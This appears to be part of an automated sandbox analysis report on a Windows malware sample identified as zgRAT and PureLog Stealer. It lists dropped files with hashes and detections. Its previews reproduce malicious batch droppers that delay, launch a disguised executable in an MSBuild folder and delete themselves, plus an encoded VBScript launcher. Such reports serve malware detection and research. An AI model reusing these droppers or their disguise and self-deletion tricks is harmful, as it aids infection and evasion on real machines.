                                      SHA-512:ED5F44D349501CBC583275E7298F7546BCAC71674055767E57CA620A0E3EC48FA23B62A3BB4153B14AB7778740298BAF89E68BBA3663542D9086C0FEDA1599CD
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):276
                                      Entropy (8bit):5.339396235008582
                                      Encrypted:false
                                      SSDEEP:6:hCijTg3Nou1SV+DEaQIH11XFh6nCvKOZG1wkn23f+U5zEh:HTg9uYDEarV1XFh6CDfE
                                      MD5:966AEE77CA87B66CC64A01E160B6E847
                                      SHA1:F8C695815CCC639AFDC08ADDB19CB3E580046334
                                      SHA-256:2EDADAC283F2960E0D9EA0B5AD61A53ED2E9D50A7D5E989E90BD6BE24C40E071
                                      SHA-512:FE6EA7A54DC89A374A98DDBC3F277066213CDF9B73C02AA869BE34C7EEE7D0A2C14AA6F8A42C0839B129322C91F95C37EAB3015D7427A1839071158EEC554393
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\0WKriXx1WO.bat"
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.243856189774723
                                      Encrypted:false
                                      SSDEEP:3:EiLrS:Pe
                                      MD5:C415E06820CD9115CC11D038540FC0D5
                                      SHA1:C9F688DE700821B4A539C97E6193713F3102131B
                                      SHA-256:052B5FD2306FC2E75FECFDD17778C926C5EDF36C235712DB1776B2B3C67E602D
                                      SHA-512:83FD44E2A11B16311FFF33BCD189442DE695C04146079E5400B30459DB1839E8FD5DA600F37F180896BD3F8958A2530486937A411E761C33958353FABEAABEF1
                                      Malicious:false
                                      Preview:dirtbBc96hqM3ZYtSt3uPAtTn
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.023465189601646
                                      Encrypted:false
                                      SSDEEP:3:++dRWuixn:++mfxn
                                      MD5:941C54E4A3BF448D498B8635E39774D7
                                      SHA1:197DF0FF75BD3CB6B1D0ACA48316A58CE3EF49CE
                                      SHA-256:ACEEA99C26727291E522AFCA51CC815E89B3A0A57EAA8AF91664DB4331869F0F
                                      SHA-512:924EA0E49F47321A47A824276A5815D29E07D480BC7792BE3510E1691A3EF63877138450FAF0611E68F4C134D8CE59A76C396C7E86AE8894607DA4243CC19678
                                      Malicious:false
                                      Preview:OOxZiBPYKrc9EziyUKPirKVkT
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.4838561897747224
                                      Encrypted:false
                                      SSDEEP:3:t3ihsx:t3L
                                      MD5:D1A45F7A4FE281D7CBF5722B394AF983
                                      SHA1:1A0541B5C8F8935D86085612B144778A2A3CC5DD
                                      SHA-256:D4893EE33B1BD50F7BEB75BD5D6959283BFD9FC414CC4B9B51CA1F6E199F5452
                                      SHA-512:66608447D55A5EEA84404C790A909BEADB196F765F620CE3C3AA5DA6541778A06122B5B55EFA85A29747F5E29FD97BA1CCE5B6B765423503FC21C9577CE28406
                                      Malicious:false
                                      Preview:4qraxQeRbgjV28o4Rsul6FZOM
                                      Process:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):276
                                      Entropy (8bit):5.344697572197582
                                      Encrypted:false
                                      SSDEEP:6:hCijTg3Nou1SV+DEaQIH11XFh6nCvKOZG1wkn23fNirn:HTg9uYDEarV1XFh6CDf1ir
                                      MD5:B39DDCB6B583EA3C9DB4574BDFA225D4
                                      SHA1:E16067A98FDF265858DA0DF2C96FD9C1C2E21F4A
                                      SHA-256:BA6D18C4FB320508963F6B034D3CDD2CC1948E907F140FA1E77833AAA397CD2D
                                      SHA-512:21F60DDAFC58A1084D9DD674E7F79AE8581B5131E9D60724F3CD0C883FBF952A061B7E8E813311739ED695A801FFB897DB91601CD98D84D0ED0102375125D3CB
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\5K6fCoMBVq.bat"
                                      Process:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.003856189774724
                                      Encrypted:false
                                      SSDEEP:3:6XI0bpzy:6XI0U
                                      MD5:D2576248AD9AD30BCFC77CD9374BDB5E
                                      SHA1:F39CEC6D58F7955032E4DEBACB0C92713A5E793C
                                      SHA-256:1BF862C555A4C23A3753859993DBA1E6CB4A12351FD591617C11F87CC0592E8A
                                      SHA-512:51DB4350B34C085BBD44AE0B1DFEC7923AF143743ADBEB100DC94DA725AEB8049377145772DF24FD336FE35F7C0896A77E54D6DE49F60A502418A420CDC66BFA
                                      Malicious:false
                                      Preview:XdsdJneEd5zgVgxUdjCPELVL9
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.213660689688185
                                      Encrypted:false
                                      SSDEEP:3:N2FA21G:NgAr
                                      MD5:BD2BF7F25FEFDFE93882CF7DE20AB968
                                      SHA1:D047223B818882169A5924D4EF45329828649DD4
                                      SHA-256:F78DEA3E81C7E6F6721C35019BF30673FDA1CA255F555A661CFDFBFCD3B99E97
                                      SHA-512:2F5124CAC525C3C99B83711569E33E1D122E27FFF8C2BEE85A3A4774458D8FF3A49F6479B2500470A54E7C2F1F9934224F0977F0371DE6DFE69BE795B5D1CC58
                                      Malicious:false
                                      Preview:YCZdvS6R8uhcCRfOPPaZtyRLW
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):276
                                      Entropy (8bit):5.32407951251747
                                      Encrypted:false
                                      SSDEEP:6:hCijTg3Nou1SV+DEaQIH11XFh6nCvKOZG1wkn23f2R:HTg9uYDEarV1XFh6CDf+R
                                      MD5:CABD2A91DD6B56E0B8C8F553C0F2133F
                                      SHA1:5477FA1650A2D134CCC441D65AB76AB6B5692F7B
                                      SHA-256:57CC30040B6D598EF74A730439CA12AE0F6E04EB9370E78B058DF59C686A43EB
                                      SHA-512:81B7B7BBF13074331BC7821324299CC081D0EB2C92C03358EF5C623EDF246886449B57FE6E855655852A286C4798C221E4E215308193FC25C3DE86A2408675D1
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\DoC45cXmCX.bat"
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):228
                                      Entropy (8bit):5.371093766449748
                                      Encrypted:false
                                      SSDEEP:6:hCRLuVFOOr+DEaQIH11XFh6nCvKOZG1wkn23fV:CuVEOCDEarV1XFh6CDft
                                      MD5:CD874997A856FBD785749E031DF7CD33
                                      SHA1:233F9ECF780B9120B64B2110DD48CE1C797C851A
                                      SHA-256:E8523EF0500D445B120EDB146AF2743848F4696E1E76F6C3365DE8C828675FC4
                                      SHA-512:36BAB5BD9586E95B4C2A236AA94DE5F93E92CB9F9F42532B71AA55AE71005A97E331F975E7D202B8336E0C8A974902D3FD64C15AC65C2D06ACEAF10B60296CD8
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\ECvQfnJznV.bat"
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):276
                                      Entropy (8bit):5.358233172808352
                                      Encrypted:false
                                      SSDEEP:6:hCijTg3Nou1SV+DEaQIH11XFh6nCvKOZG1wkn23fFSNK:HTg9uYDEarV1XFh6CDfx
                                      MD5:B5579C996822B2E655ECCB16D69AF1B2
                                      SHA1:B0D258B63A2A517030C5B80A213D6C26FA7DF8F5
                                      SHA-256:08E3C7606FC513E5AC90024E14C7EA801D10E0EE43598B13F831D2D4916C15FA
                                      SHA-512:DBB6CA9DF37DF3E52D7C5525321E5C5A6618A880116BAB35F22419C60861D184C6571B46CFB4E63E9D9B5043288798E7FE99540265DD1451D598C89C559B853A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\GxEp7zFCwB.bat"
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.0194705707972505
                                      Encrypted:false
                                      SSDEEP:3:tmnTQt:tmTQt
                                      MD5:F166D9111698390A630902D4A3331F3E
                                      SHA1:7AE5A612772F546BECD47B7A605A0A08B95A0B57
                                      SHA-256:6C1B35062BD8C09F347E96DBB8F651BFA0C0D6B73457667715D02926B69E4800
                                      SHA-512:F72313CF2B26C1E907F9238F63F3246A98EE4F0C2D0BB2B3604D7D82DDDD4A6C5CF4B92B1D9492BB67A0E4E877E4D5A1B9E1F7F8E4D09A53805F52356A5C1E7C
                                      Malicious:false
                                      Preview:IClfDarmNAWQEsEcAxbfeAzAA
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.103465189601646
                                      Encrypted:false
                                      SSDEEP:3:yS6nbkVQYL/5:B6nbkN
                                      MD5:341B5C84334FB15B7E31342B8E9FCCBA
                                      SHA1:7FD42E71238102C39AEE2C1D54B48C8E97CC0945
                                      SHA-256:84ED5FA890FC711C2399D1C1A4C8451FDAD4433A9C5E14EAC0376FDF74EE172D
                                      SHA-512:68FF599E97749DA1BE100411FA8FFE515EE5E275FAD63FA61B9ED219EE754A2F7D48AE19990ADDB089BF82C6E060DD69BA8E4A92C02002FC1D22657001A9B936
                                      Malicious:false
                                      Preview:OQPE7JGakLPu9OpuuGMn3K4oG
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.403856189774723
                                      Encrypted:false
                                      SSDEEP:3:oxK/10ux:oxk+ux
                                      MD5:1652217EA06BF080F5F65A4505E1B3F6
                                      SHA1:ACD6BC928E29CD510FE275765A00CC30CBFD7614
                                      SHA-256:F199DEC07178EC254A4C14C8A5B8ED97A3006B1B0BC374F3563FCA80B14CBF08
                                      SHA-512:5A3D93371776A7CD855CBFF9DFF4962331202456215BA18FE8A6E37EDFDC4F99F9097D8CC4C1092E59ED036097985B60C83F74A771B19A2B561E7EDC89F53D70
                                      Malicious:false
                                      Preview:AJhCD0K87z5UxrZd4PQ1RSSRr
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):276
                                      Entropy (8bit):5.318883158902565
                                      Encrypted:false
                                      SSDEEP:6:hCijTg3Nou1SV+DEaQIH11XFh6nCvKOZG1wkn23famn:HTg9uYDEarV1XFh6CDfim
                                      MD5:A038BE5A1B499700CF7917BE79C24979
                                      SHA1:FD62D98CF8E18522EDA35ADA3763099EA3BE6F5A
                                      SHA-256:C55C53A73E860E1718848C01C1B22ECFEA3893295B4617EA5779852BD1B5E15E
                                      SHA-512:16432F8DFA2697A25D155174065EB70C68176158D553F4CD8C62EA391AC6F1A959256B2497874349FA0E1B74A73F0C0398D00B22712A5205B2CAC09C2A6CB0CC
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\UCvjmtCiY3.bat"
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.0536606896881855
                                      Encrypted:false
                                      SSDEEP:3:MIqnd+X1sXn:M34X1sX
                                      MD5:3A3350A67BB49176224B6013F6CF2DCD
                                      SHA1:8730906BA220F8DB872BBC86F2F3F76D214D1F44
                                      SHA-256:2B1F27DBD015FA0F40C380D14DD18835A7E992992977CE51ABC05982CE65866E
                                      SHA-512:B56AB8C49E74BD3B0ED100521BC9CAA1CE02CDFFECBE8FBF6625F687A3096D0EC758CD6927A0F12872AA5587E346E79C8DF8FCBF0284AFE441D631615DDDB373
                                      Malicious:false
                                      Preview:riviBamOvNiJwNmjeB1PZA9KZ
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):276
                                      Entropy (8bit):5.348827588273908
                                      Encrypted:false
                                      SSDEEP:6:hCijTg3Nou1SV+DEaQIH11XFh6nCvKOZG1wkn23fBMDkh:HTg9uYDEarV1XFh6CDfCq
                                      MD5:116FF2C63FE1287C0BF0CCA8241AA1F2
                                      SHA1:B45F28B2A7FB283660408B64A06BDE3D24ADD4E7
                                      SHA-256:9B074C9635123303076A959F13E94A3DF48F0D665F7726E2723FA1391B87A2BF
                                      SHA-512:6A33CE613C4B7C30B5F46882031AA25422B563B29A45AF11447377FBDD5A971FA30E3BF19DE85AF7216DAF56AE2B0FFC454426FAD704CBA648CC358B0FE32900
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\bviytIjYVg.bat"
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):276
                                      Entropy (8bit):5.309901687146654
                                      Encrypted:false
                                      SSDEEP:6:hCijTg3Nou1SV+DEaQIH11XFh6nCvKOZG1wkn23fWg:HTg9uYDEarV1XFh6CDf+g
                                      MD5:203D21D95C66FC016AE23D9BC255643E
                                      SHA1:B3A5930FA74A2C264CA07892DB8034AEB80541FA
                                      SHA-256:AF5C26ACEED90FB4A15073BBC26C4BFE9F6891D0FAA833BE65420E5FB364608E
                                      SHA-512:282964CAC70773D46742AD5E923741CCBAEE33113929C6A41A31F5F3116F1B494CC6AB3C1B00FBDEDCB8C8ADC2879E251903B0644280871A93182455A09803AA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\ddp3dI2Wa5.bat"
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.403856189774723
                                      Encrypted:false
                                      SSDEEP:3:IicireLm:IUrv
                                      MD5:4D6BAEC18A66CCFB0443D77CD783D552
                                      SHA1:06BE0D11667685AB1A14E76D1896AA7E785C3D05
                                      SHA-256:CA829623841A094606055D292EB4204917970C6C9D36004D6D163B111779F36E
                                      SHA-512:4F2DA30AFDB6C18B15499F5246A589E3F547AC164150B9C274E1B34819083B6A8F41D2B4264CD677EA5F1EB243585EB39B781438B3204CCA7E261493F1294E53
                                      Malicious:false
                                      Preview:EhvKZqDLqEajw0tQnu2iJs33C
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.4838561897747224
                                      Encrypted:false
                                      SSDEEP:3:OUFoMqn:OU6X
                                      MD5:170AEB0B8FC0E9C8AB227B5500E93954
                                      SHA1:08BBAAE5C2FC0970A54276D13CDB763075E4D767
                                      SHA-256:F25FD5BAEE9A5F73EEEFCD4C2D84DBCA8BF846E2435659936C91FFD02D81D561
                                      SHA-512:2D80D6EC2D7AE1F10C37E79291C5E4ACC8D543DFE179BC477F17986588A753BBB343182D08443C1F9FB46A54AEF24FA1F7ADA70FBC2F4AAED39448DF80462599
                                      Malicious:false
                                      Preview:HItqsNVRI6nhzwFYyfSRxMu09
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.403856189774723
                                      Encrypted:false
                                      SSDEEP:3:IcaRqC0YW:IjqC0h
                                      MD5:D4082058232F38F454DB86233B1285CA
                                      SHA1:780ADC5A831BE47EC61E1290BA480B257B69F920
                                      SHA-256:480220CA481E456DF0BA0F70A4DBAC3AFDCE186F4A217482EFD947C91BFBDA54
                                      SHA-512:C55B19CCD9EFC5C9A8D2C0FBB275E90314DE6CB5DA6FF3FC320DCC771199C4B847364D8913C59B8026E8C814E1AC72A1BC7E05F55DFE62A0C0A468AA1FC32B92
                                      Malicious:false
                                      Preview:DLe9s6JySaTi4n9QagQvl2O8q
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):276
                                      Entropy (8bit):5.340408228828121
                                      Encrypted:false
                                      SSDEEP:6:hCijTg3Nou1SV+DEaQIH11XFh6nCvKOZG1wkn23fLG4uuq:HTg9uYDEarV1XFh6CDfjG4zq
                                      MD5:AEE2E03AD2CBC7935DC580CEE5CCB1FA
                                      SHA1:8DB52B29E6DA073DF8445A9EF079E00F93BB1D3C
                                      SHA-256:EA67265F7C7C6A192DBDF6CBD283545E14753FBB8D023DF203CE480008EE17FA
                                      SHA-512:7A5F435B12141D6D4723C334A86D980C89698B805A94947A1FFA7ED6A604680DA0F42F99D5645B6B1778DE73D4C93BDB177295E3C516723CCAAC4C04D8D5AEAA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\nXpNUGu1Ke.bat"
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):228
                                      Entropy (8bit):5.327177261908314
                                      Encrypted:false
                                      SSDEEP:6:hCRLuVFOOr+DEaQIH11XFh6nCvKOZG1wkn23f7l:CuVEOCDEarV1XFh6CDfTl
                                      MD5:680193250AF14B51273437F4DA4FD5B8
                                      SHA1:D40CC8F082402C677B6863C2898068022EEA7A55
                                      SHA-256:CF182EBA2827DF394C39727BA67F08586A8FEDDC638EBDF705A2BBD3F20FA548
                                      SHA-512:CD9B30C164CD73785843994883AD81AA9302077F1E598C1B5CB6580A6DBB0078DEA18AC521DC1C69AF59B8BA0F1BFDDF17DDE5D0971694E3327AA26A34891D83
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\nhkbaghNki.bat"
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):276
                                      Entropy (8bit):5.313560168813636
                                      Encrypted:false
                                      SSDEEP:6:hCijTg3Nou1SV+DEaQIH11XFh6nCvKOZG1wkn23fHWnMqn:HTg9uYDEarV1XFh6CDfenMqn
                                      MD5:DA6ADE8BE19CFEE2A150B6A3EF995765
                                      SHA1:3834680854371B414DF2E7E7E63A0C2CCE767BF4
                                      SHA-256:9894C46EC4E049E11FA6D279EB9BCC4BC2F6090F3F65E67670245CC8E5C4491D
                                      SHA-512:C4EFF55C39319B7E35C6885C2196117B63C69E5B68A94EE6A8A024C7D7B05C5242021AB105118BE383D865DCACFFD241E1C35E4CA7CFFBBC7A60F0D50FA85626
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\qlEmwzstBs.bat"
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):276
                                      Entropy (8bit):5.317411903382027
                                      Encrypted:false
                                      SSDEEP:6:hCijTg3Nou1SV+DEaQIH11XFh6nCvKOZG1wkn23f5S:HTg9uYDEarV1XFh6CDfxS
                                      MD5:A619CB7AA89011DFC722C6BBF275E20C
                                      SHA1:3B456D873AD2ED960B29C9F855F060FB1CEAB082
                                      SHA-256:217DECCC533AAA42C1D446ACE2A7DD2583E84727440C792E622CE5386A2A6545
                                      SHA-512:EC59ABC962C25ACF3B9753B848C93A07F3B953E9F29E40CF492D7137A30A5C84AC86C434FDE8D70B658271D28D37D5C2518FA4CFE548D542D2297F8FD369ADE2
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\ujuZrulyBl.bat"
                                      Process:C:\Users\user\Desktop\7vP2IvNXqx.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):252
                                      Entropy (8bit):5.901675636760285
                                      Encrypted:false
                                      SSDEEP:6:G7wqK+NkLzWbHa/818nZNDd3RL1wQJRZ70OeWtOp+FpGd0gSD3Rxgas:GyMCzWLaG4d3XBJr73ePp6X/RU
                                      MD5:501D197D63D450807FF2A2E971164369
                                      SHA1:D93FEBA0475AE1BCD82507DB5C2FF6439549683F
                                      SHA-256:A7C725C92D2C750356D0A7C5754F4BF1F5B8DAA4CE2CC24E5B9B7C789C75E601
                                      SHA-512:5BB0BD4E3CDF77C68F663F8E1C940A5266E944491E1D4A8125581C4FFECA9DA580F29F412C66CD0434A9B33842F031B03E790F79F83C7FD28DFC464E52849530
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:#@~^4wAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~Ju)aw9mYm]zs/h.W7k[+M4.GS/+M.+6NV^&&X! .|^qAAZ.}y8[kUCV%OGqCzlSJVd*lV.h*d,MWVD$Gc4CYr~~TBP0ms/.AkkAAA==^#~@.
                                      Process:C:\Users\user\Desktop\7vP2IvNXqx.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):1656320
                                      Entropy (8bit):7.420770523484582
                                      Encrypted:false
                                      SSDEEP:24576:7nCWlkJXwz6a/Ji9v8yK6V3RO2GGqF252dfr3MuURBkIELgTZRZQoYyx8MU:7TAjRK61bGW2djTuBkLIX8
                                      MD5:07A0FB75F52C87371C88F48AE80AFA1B
                                      SHA1:A2184C8F4C5A1B81A1E8BF426DB05EAC504A66A0
                                      SHA-256:51DF5CF4F67D6148C92D2BDAA10596F2952371B8C3EC85D21CDF74AF6274AF34
                                      SHA-512:0322117985791E69BA8E985659B7F91FCCA76809C998C9AE4AF5FCD98B2D757E8E18960FBE3C6D9C9AC306E5F01A78D7E70E950D3B77A80ABA1698C5B69C75CB
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, Author: Joe Security
                                      Antivirus:
